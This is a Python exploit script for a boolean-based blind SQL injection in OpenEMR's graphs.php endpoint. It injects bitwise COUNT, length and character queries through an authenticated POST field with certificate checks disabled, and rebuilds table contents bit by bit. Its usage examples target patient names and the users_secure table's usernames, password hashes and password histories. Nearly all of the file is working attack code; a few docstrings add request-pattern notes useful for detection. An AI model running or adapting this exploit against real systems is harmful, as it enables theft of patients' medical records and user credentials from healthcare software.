def generate_full_string_bit_queries(table: str, column: str, offset: int, max_length_bits: int = 8, char_bit_count: int = 8):
    """
    Generates all SQL bitwise queries to extract a full string.

    1. Queries for the length (bitwise)
    2. Queries for each character (bitwise)

    The number of characters is not known when this generator is created:
    it is read from the module global `current_string_size`, which `process`
    sets once the length marker has been consumed.

    :param table: SQL table name
    :param column: Column name
    :param offset: OFFSET for LIMIT 1
    :param max_length_bits: Number of bits for length (default 8)
    :param char_bit_count: Number of bits per character (default 8)
    :yield: ``(name, query)`` pairs from the length and character
            generators, then ``('string', None)`` once all characters of
            this value have been requested
    """
    yield from generate_length_bit_queries(table, column, offset, max_bits=max_length_bits)
    # `current_string_size` is evaluated here, after the length generator is
    # exhausted, so it reflects the length decoded for this value.
    for char_pos in range(1, current_string_size + 1):
        yield from generate_char_bit_queries(table, column, offset, char_pos, bit_count=char_bit_count)
    yield 'string', None


def generate_row_count_bit_queries(table: str, max_bits: int = 16):
    """
    Generates SQL queries to extract the number of rows in a table using a bitwise approach.
    Each query tests a single bit of COUNT(*).

    :param table: Table name
    :param max_bits: Number of bits to extract (default 16 for up to 65535 rows)
    :yield: ``(name, query)`` for each bit, with ``name`` equal to
            ``'count <table>'``, followed by one ``(name, None)``
            end-of-value pair
    """
    for bit in range(max_bits):
        div_value = 2 ** bit
        yield "count " + table, (
            f"(SELECT ((COUNT(*) DIV {div_value}) MOD 2) "
            f"FROM {table})"
        )
    # End-of-value marker for the row count.
    yield 'count ' + table, None


def generate_all_rows_multiple_columns_bit_queries(table: str, columns: list, max_rows_bits: int = 16, length_bits: int = 8, char_bits: int = 8):
    """
    Generates all SQL bitwise queries to extract multiple columns from all rows in a table.

    1. First yields queries to determine the number of rows (bitwise)
    2. Then, for each row (offset), yields bitwise queries for each column.

    The row loop is bounded by the module global `current_line_number`,
    which `process` sets when the row-count marker is consumed.

    :param table: Table name
    :param columns: List of column names to extract
    :param max_rows_bits: Number of bits for row count (default 16)
    :param length_bits: Number of bits for length extraction per column (default 8)
    :param char_bits: Number of bits per character (default 8)
    :yield: ``(name, query)`` pairs and ``(name, None)`` markers from the
            nested generators
    """
    yield from generate_row_count_bit_queries(table, max_bits=max_rows_bits)
    # Read after the count generator is exhausted; see the docstring.
    for offset in range(current_line_number):
        for column in columns:
            yield from generate_full_string_bit_queries(
                table, column, offset, max_length_bits=length_bits, char_bit_count=char_bits
            )


def fetch(host, condition, cookie_value, csrf_token, resource="/library/ajax/graphs.php"):
    """
    Perform an HTTPS POST request to the specified host carrying one boolean
    test, authenticated with the OpenEMR session cookie.

    `condition` is placed in the WHERE clause of a fixed SQL fragment that is
    sent in the `name` form field, together with `table=LBF`, an empty
    `title` and `csrf_token_form`. How the server uses `name` is not shown
    in this file.

    SSL certificate verification is disabled (equivalent to curl -k), so the
    session cookie and CSRF token are sent to a peer whose identity is not
    checked.

    Seen from the server, a run is a long series of POSTs to `resource` from
    one session, each with SQL keywords (`UNION ALL SELECT`, `DIV`, `MOD`,
    `LIMIT 1 OFFSET`) in the `name` field; request logging or a filtering
    rule can match on that. The file header gives the affected range as
    Open EMR <8.0.0.1.

    :param host: Target IP address or hostname
    :param condition: SQL expression inserted after WHERE in the `name` field
    :param cookie_value: Value of the OpenEMR session cookie
    :param csrf_token: Value of the OpenEMR CSRF token
    :param resource: Path to the target resource
    :return: Raw response body as bytes
    """
    params = {
        "table": "LBF",
        "title": "",
        "name": (
            "date, 1 FROM (SELECT 1 AS field_value) AS ld JOIN "
            "(SELECT 1 AS n UNION ALL SELECT 2 UNION ALL SELECT"
            " 3 UNION ALL SELECT 4 UNION ALL SELECT 5) AS numbers"
            f" WHERE {condition} UNION ALL SELECT ld.field_value AS date"
        ),
    }
    params["csrf_token_form"] = csrf_token
    # Parentheses are left unencoded in the form body.
    content = urlencode(params, safe="()")
    url = f"https://{host}{resource}"
    # Private `ssl` helper: returns a context with certificate checks off.
    context = _create_unverified_context()
    # Supplying `data` makes urllib send the request as a POST.
    req = Request(url, data=content.encode())
    req.add_header("Cookie", f"OpenEMR={cookie_value}")
    with urlopen(req, context=context) as response:
        return response.read()


def process(results: dict, name: str):
    """
    Post-process a results entry based on its name prefix.

    - If name starts with "count", convert bits to int, store it back in
      results and update global current_line_number.
    - If name starts with "length", convert bits to int, store it back in
      results and update global current_string_size.
    - If name starts with "ascii", convert bits to int, then to chr, update
      the results dict, and store the name in global last_string_id.
    - If name starts with "string", concatenate all characters corresponding
      to last_string_id (from results) and print the full string. The
      concatenated string is printed only; it is not written to results.

    Each branch also prints a progress line. The bit strings are expected
    most-significant bit first, which is how the caller builds them.

    :param results: Dict storing the bit strings or computed characters.
    :param name: The key in results to process.
    """
    global current_line_number, current_string_size, last_string_id
    value = results[name]
    if name.startswith("count"):
        val_int = _bits_to_int(value)
        current_line_number = val_int
        results[name] = val_int
        print("[#] Row count for table:", name.split()[1], val_int)
    elif name.startswith("length"):
        val_int = _bits_to_int(value)
        current_string_size = val_int
        results[name] = val_int
        _, table_column, offset = name.split()
        print("[#] String length:", table_column, offset, val_int)
    elif name.startswith("ascii"):
        char = results[name] = chr(_bits_to_int(value))
        last_string_id = name
        print("[>] Character recovered:", char)
    elif name.startswith("string"):
        if last_string_id is None:
            results[name] = ""
            return
        characters = ""
        # The last "ascii ..." key ends with the position of the final
        # character; everything before it identifies the value.
        *identifiers, position = last_string_id.split()
        identifiers = " ".join(identifiers)
        for position in range(1, int(position) + 1):
            character = results[identifiers + " " + str(position)]
            characters += character
        print("[+] Extracted string:", identifiers, characters)
        last_string_id = None


def identify_boolean_via_checksum(host, cookie_value, csrf_token, *args, resource="/library/ajax/graphs.php", **kwargs):
    """
    Identify boolean behavior (0 or 1) by comparing response content.

    Despite the name, no checksum is computed in this function: a non-empty
    response body is recorded as bit 1 and an empty body as bit 0.

    Workflow:
    1. Iterate over values yielded by `generate_all_rows_multiple_columns_bit_queries`.
    2. For a pair whose payload is None, call `process` to decode the bits
       collected under that name.
    3. Otherwise send the payload with `fetch` and classify the response as
       logical 0 or 1.

    :param host: Target IP address or hostname
    :param cookie_value: OpenEMR session cookie value
    :param csrf_token: Value of the OpenEMR CSRF token
    :param args: Positional arguments forwarded to the query generator
    :param resource: Target resource path
    :param kwargs: Keyword arguments forwarded to the query generator
    :return: Dictionary mapping each query name to its decoded value
             (int for counts and lengths, one-character str for characters)
    """
    results = defaultdict(str)
    for name, payload in generate_all_rows_multiple_columns_bit_queries(*args, **kwargs):
        if payload is None:
            process(results, name)
            continue
        response = fetch(
            host, payload, cookie_value, csrf_token, resource
        )
        # Bits arrive least-significant first; prepending each one leaves the
        # string most-significant first, as int(bits, 2) expects.
        if len(response):
            results[name] = "1" + results[name]
        else:
            results[name] = "0" + results[name]
    return results


def parse_arguments(): """ Parse command-line arguments for the OpenEMR boolean checker. Mandatory arguments: - host : Target host/IP - cookie : OpenEMR session cookie - csrf-token : OpenEMR csrf token - table : Table name (must exist in schema.json) - columns : One or more column names (must exist in schema.json[table]) Optional arguments: - --path : Resource path (default: /library/ajax/graphs.php) - --list-schema : Display all available tables and columns and exit :return: argparse.Namespace with attributes: host, cookie, csrf-token, table, columns, path """ parser = ArgumentParser( description="Boolean-based OpenEMR checker using SHA1 comparison" ) parser.add_argument("host", help="Target host/IP (mandatory)") parser.add_argument("cookie", help="OpenEMR session cookie (mandatory)") parser.add_argument("csrf_token", help="OpenEMR csrf token (mandatory)") parser.add_argument("table", help="Table name (mandatory)") parser.add_argument("--columns", required=True, action="extend", nargs='+', help="Column names (at least one required)") parser.add_argument("--path", default="/library/ajax/graphs.php", help="Resource path (default: /library/ajax/graphs.php)") parser.add_argument("--list-schema", action="store_true", help="List all tables and columns from JSON and exit") args = parser.parse_args() if args.list_schema: print("Available tables and columns:") for table, cols in 
schema.items(): print(f"- {table}: {', '.join(cols)}") exit(0) if args.table not in schema: parser.error(f"Table '{args.table}' not found in schema") invalid_cols = [c for c in args.columns if c not in schema[args.table]] if invalid_cols: parser.error(f"Invalid column(s) for table '{args.table}': {', '.join(invalid_cols)}") return args def main(): """ Main entry point of the OpenEMR SQL Injection exploit. Workflow: 1. Parse command-line arguments (host, cookie, table, columns, optional path). 2. Validate that the table and columns exist in the schema JSON. 3. Call `identify_boolean_via_checksum` with the provided arguments. 4. Display the results. Usage example: python3 exploit.py 172.18.0.3 84c7dded187f7601e7f0cd3d0a1780f2 583918e787c3d7816d9cb522ab103d099e55b603 patient_data --columns fname mname lname python3 exploit.py 172.18.0.3 84c7dded187f7601e7f0cd3d0a1780f2 583918e787c3d7816d9cb522ab103d099e55b603 users_secure --columns username password password_history1 password_history2 password_history3 password_history4 """ arguments = parse_arguments() identify_boolean_via_checksum( arguments.host, arguments.cookie, arguments.csrf_token, arguments.table, arguments.columns, resource=arguments.path ) main()